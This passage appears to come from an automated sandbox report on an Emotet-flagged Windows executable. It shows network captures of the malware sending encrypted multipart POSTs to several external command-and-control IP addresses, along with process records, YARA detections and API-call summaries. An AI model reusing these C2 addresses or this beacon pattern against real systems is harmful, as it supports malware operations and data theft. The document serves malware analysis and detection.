                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:10:06.955037117 CEST | 4628 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 78 68 6e 38 59 46 46 30 32 6c 71 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6a 61 75 63 75 69 78 76 73 22
                                                                Data Ascii: ----------------oxhn8YFF02lqHFContent-Disposition: form-data; name="jaucuixvs"; filename="gkslbfaphs"Content-Type: application/octet-streamirENcJxh;GeBaP$uLB>&N~2*)^U_ItKO6(0/7]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.6 | 49735 | 107.170.146.252 | 8080 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:10:30.931354046 CEST | 572 | OUT | POST /59QulnlrGjN3xHL/Y0uv73jS/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 107.170.146.252/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=-------------------GLzKnj3AY6lNu0XkAPz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 107.170.146.252:8080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.6 | 49739 | 173.212.214.235 | 7080 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:10:54.678457975 CEST | 559 | OUT | POST /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 173.212.214.235/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------8eRw1EpsQ
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 173.212.214.235:7080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:10:55.327039003 CEST | 431 | IN | HTTP/1.1 404 Not Found
                                                                Date: Tue, 20 Aug 2024 17:10:55 GMT
                                                                Server: Apache
                                                                Content-Length: 230
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 52 33 30 5a 53 2f 4b 73 34 56 68 2f 64 37 33 54 63 37 34 77 34 47 4a 52 2f 43 7a 65 68 56 4f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ was not found on this server.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.6 | 49740 | 167.114.153.111 | 8080 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:10:58.709069014 CEST | 559 | OUT | POST /IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 167.114.153.111/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=--------kYHRLcw3
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 167.114.153.111:8080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.6 | 49741 | 67.170.250.203 | 443 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:11:02.433474064 CEST | 607 | OUT | POST /vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 67.170.250.203/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------Eoyapxu02W4DrmN
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 67.170.250.203:443
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.6 | 49742 | 121.124.124.40 | 7080 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:11:05.081152916 CEST | 552 | OUT | POST /gLDpms1fYdKy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 121.124.124.40/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=----------------xQkdZnrmTvVZqhGU
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 121.124.124.40:7080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.6 | 49745 | 103.86.49.11 | 8080 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:11:10.167423010 CEST | 582 | OUT | POST /9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 103.86.49.11/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------------55np6X3FuJzN6N0jwc7TN
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 103.86.49.11:8080
                                                                Content-Length: 4612
                                                                Cache-Control: no-cache


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.6 | 49747 | 74.214.230.200 | 80 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:11:35.085169077 CEST | 598 | OUT | POST /LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 74.214.230.200/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------08lfRHAZEMwmT24
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 74.214.230.200
                                                                Content-Length: 4612
                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:11:35.085203886 CEST | 4612 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 38 6c 66 52 48 41 5a 45 4d 77 6d 54 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 78 70 74 79 75 6e 6e 63
                                                                Data Ascii: -----------------08lfRHAZEMwmT24Content-Disposition: form-data; name="xptyunncwtcez"; filename="qkba"Content-Type: application/octet-stream*@nHPV@fn9_,E>)]*uEk& ]zkQ!%aD0B*Rf


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.6 | 49749 | 194.187.133.160 | 443 | 424 | C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Aug 20, 2024 19:11:59.081681013 CEST | 632 | OUT | POST /67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXzrG/URwQPsLPEtkyUnGKT/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 194.187.133.160/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------ZhnuNfjLptUX6mp
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 194.187.133.160:443
                                                                Content-Length: 4596
                                                                Cache-Control: no-cache



                                                                Target ID:0
                                                                Start time:13:09:55
                                                                Start date:20/08/2024
                                                                Path:C:\Users\user\Desktop\ExeFile (233).exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ExeFile (233).exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:13:09:55
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\SysWOW64\rtmpal\dfscli.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\rtmpal\dfscli.exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:13:09:56
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"
                                                                Imagebase:0x400000
                                                                File size:471'040 bytes
                                                                MD5 hash:59287B19F7D85E749D19A57337103045
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:13:10:41
                                                                Start date:20/08/2024
                                                                Path:C:\Windows\System32\svchost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                Imagebase:0x7ff7403e0000
                                                                File size:55'320 bytes
                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:2.9%
                                                                  Dynamic/Decrypted Code Coverage:51.6%
                                                                  Signature Coverage:25.4%
                                                                  Total number of Nodes:562
                                                                  Total number of Limit Nodes:75
                                                                  execution_graph (rendered graph data omitted)

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,EncryptFileA), ref: 00402563
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402566
                                                                  • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 00402571
                                                                  • LoadLibraryA.KERNEL32 ref: 004028F0
                                                                  • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 004028FA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040291E
                                                                  • LdrFindResource_U.NTDLL(00400000,?,00000003,?), ref: 00402940
                                                                  • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 00402961
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402974
                                                                    • Part of subcall function 00403B40: LoadIconA.USER32(?,00000080), ref: 00403C94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressLoadProc$Library$AccessAllocEncryptFileFindIconResourceResource_Virtual
                                                                  • String ID: 2sqN7HPu$ul(RB@jWoBnNar^zWR24F02n#bnM3gX6zQ>^jmGICwkhJ?*#2^h2EEKd&#?A8<JT0c%Q?f1Y6Da*fKp6B+(L3!F<O*&V$Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$Ldr$LdrAccessR$LdrFin$LdrFindResource_U$dReso$esource$ntdll.dll$r_n$sResource$tdll$urce_U
                                                                  • API String ID: 2745701538-3822946923
                                                                  • Opcode ID: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction ID: 7606226607a74ee82f4d59785f456a1b28ac7059c3ee9b1f73d73fed3cc09996
                                                                  • Opcode Fuzzy Hash: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction Fuzzy Hash: 074208B19083C0DBD331DF1AC585BCBFBE4AB99704F44492FA1C953291DAB8A548CB5B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021F4054,021F4040), ref: 021F1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021F104E
                                                                    • Part of subcall function 021F1B30: SetLastError.KERNEL32(0000000D,?,021F1070,?,00000040), ref: 021F1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021F1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: b073770b48b588f256191236cab786e860ce3197099eb4eb5eacb28a3681fc75
                                                                  • Instruction ID: 7d007817ae0e5d6418b3f6f64f7da51958a514b127af4bb7dacac3c8bc73f0fa
                                                                  • Opcode Fuzzy Hash: b073770b48b588f256191236cab786e860ce3197099eb4eb5eacb28a3681fc75
                                                                  • Instruction Fuzzy Hash: 33F1EDB4E40209EFDB44DF94D984BAEB7B1BF88314F108599EA29AB341D735EA41CF50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,0226998D,16BF64F2,00000001), ref: 02263976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,0226998D,16BF64F2,00000001), ref: 02263A5D
                                                                  • FindClose.KERNELBASE(?,00000000,0226998D,16BF64F2,00000001), ref: 02263B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: 4a571c7725c3f5fff95127ab016b045ba9eb2a4e4743d5b2d63cf478e35efda9
                                                                  • Instruction ID: 013facd2e002c205cde5e1f3673b29a03b146e4de98c2bff109adeeadb5f294c
                                                                  • Opcode Fuzzy Hash: 4a571c7725c3f5fff95127ab016b045ba9eb2a4e4743d5b2d63cf478e35efda9
                                                                  • Instruction Fuzzy Hash: 53510C77B253025BC734EAF4A85C77B32D6ABC0B04F00489DE946C7248EE76CC948B92

                                                                  Control-flow Graph: function 2268240 (graph nodes 604-651; API call shown in graph: CreateFileW; executed/not-executed node colouring and edge list not reproduced)
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022683A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: J$.#v
                                                                  • API String ID: 823142352-3621003161
                                                                  • Opcode ID: 30c97c60238384f0a97d117f7023aaae91cc524d4b2775ab3e5b6787b8c30196
                                                                  • Instruction ID: bdc381ba2c7dfffdec7ac2fe0f2b5c4093456845ed473f00d1d3de6bfccb8cae
                                                                  • Opcode Fuzzy Hash: 30c97c60238384f0a97d117f7023aaae91cc524d4b2775ab3e5b6787b8c30196
                                                                  • Instruction Fuzzy Hash: 4B61BC73A153029FC708DFA8D488A2FB7E2ABC4744F04891DF4959B288D774C9498BD3
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02264344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: da66a822a7c663d8af3f7f8d7b911279ce126e00212874470fe5f3f700cba7d9
                                                                  • Instruction ID: 2ab0c478892dbf692397a817110d44e129a61ac8d720992b3189d069aa8452e4
                                                                  • Opcode Fuzzy Hash: da66a822a7c663d8af3f7f8d7b911279ce126e00212874470fe5f3f700cba7d9
                                                                  • Instruction Fuzzy Hash: B5E06573B512066F9B14F6F574AC67B25ABABD1A807188869F441CB348EEB08C514BE0
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000006), ref: 00403267
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FindResource
                                                                  • String ID:
                                                                  • API String ID: 1635176832-0
                                                                  • Opcode ID: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction ID: 81cb0e02c961f06c601f38abdce0fa68ed7433aa8319f068ff8f8c5a31199cb9
                                                                  • Opcode Fuzzy Hash: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction Fuzzy Hash: 57D0C2263000202AE5101A0A7C01DBB679CDBC5636B01407FF881EA150D2349C03A1B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79bb1fcc020155563c7cc4a2954cba24265ea2a619610a4c7e0d977e309fa0fa
                                                                  • Instruction ID: 89b8f714c6d77962538825249d7482e3452185ede8dc8e96fc1d04669f1ea640
                                                                  • Opcode Fuzzy Hash: 79bb1fcc020155563c7cc4a2954cba24265ea2a619610a4c7e0d977e309fa0fa
                                                                  • Instruction Fuzzy Hash: 670207757002018BD710DB28C451F2677A2AF99718F3886ADE549AF3D6D77AEC42C7C8

